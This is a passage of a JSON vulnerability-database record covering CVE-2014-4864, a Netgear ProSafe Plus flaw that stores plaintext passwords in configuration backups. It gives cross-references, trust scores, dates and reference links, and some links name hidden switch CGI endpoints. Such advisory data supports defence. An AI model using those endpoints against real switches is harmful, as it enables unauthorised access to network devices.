"type": "unknown"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-72805",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "VULHUB",
"id": "VHN-72805"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#396212",
"trust": 3.6
},
{
"db": "NVD",
"id": "CVE-2014-4864",
"trust": 3.5
},
{
"db": "BID",
"id": "69666",
"trust": 1.0
},
{
"db": "JVN",
"id": "JVNVU95664911",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457",
"trust": 0.7
},
{
"db": "OSVDB",
"id": "111228",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2014-05497",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "135480",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-72805",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "BID",
"id": "69666"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "PACKETSTORM",
"id": "135480"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"id": "VAR-201409-0175",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
}
],
"trust": 1.5790423857142857
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05497"
}
]
},
"last_update_date": "2025-04-12T23:24:41.748000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ProSafe Plus Switches FAQ",
"trust": 0.8,
"url": "http://kb.netgear.com/app/answers/detail/a_id/12048/~/prosafe-plus-switches-faq"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.kb.cert.org/vuls/id/396212"
},
{
"trust": 0.8,
"url": "http://kb.netgear.com/app/answers/detail/a_id/12048/~/prosafe-plus-switches-faq"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4864"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu95664911/index.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4864"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/69666"
},
{
"trust": 0.6,
"url": "http://osvdb.com/show/osvdb/111228"
},
{
"trust": 0.3,
"url": "http://www.netgear.com"
},
{
"trust": 0.1,
"url": "http://\u003cip-of-switch\u003e/loginhidden.cgi"
},
{
"trust": 0.1,
"url": "http://downloadcenter.netgear.com/de/product/gs105ev2#searchresults"
},
{
"trust": 0.1,
"url": "http://\u003cip-of-switch\u003e/produce_burn.cgi"
},
{
"trust": 0.1,
"url": "http://www.linux-magazin.de/blogs/insecurity-bulletin/gastbeitrag-security-by-obscurity-bei-netgear-switches"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-4864"
},
{
"trust": 0.1,
"url": "http://192.168.0.239/switch_info.cgi\""
},
{
"trust": 0.1,
"url": "http://\u003cip-of-switch\u003e/bootcode_update.cgi"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "BID",
"id": "69666"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "PACKETSTORM",
"id": "135480"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "BID",
"id": "69666"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "PACKETSTORM",
"id": "135480"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-08T00:00:00",
"db": "CERT/CC",
"id": "VU#396212"
},
{
"date": "2014-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"date": "2014-09-10T00:00:00",
"db": "VULHUB",
"id": "VHN-72805"
},
{
"date": "2014-09-08T00:00:00",
"db": "BID",
"id": "69666"
},
{
"date": "2014-09-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"date": "2016-01-28T17:21:57",
"db": "PACKETSTORM",
"id": "135480"
},
{
"date": "2014-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"date": "2014-09-10T10:55:08.347000",
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-08T00:00:00",
"db": "CERT/CC",
"id": "VU#396212"
},
{
"date": "2014-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"date": "2014-09-10T00:00:00",
"db": "VULHUB",
"id": "VHN-72805"
},
{
"date": "2014-09-08T00:00:00",
"db": "BID",
"id": "69666"
},
{
"date": "2014-09-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"date": "2014-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear ProSafe Plus Configuration Utility writes out plaintext passwords to backup configuration files",
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…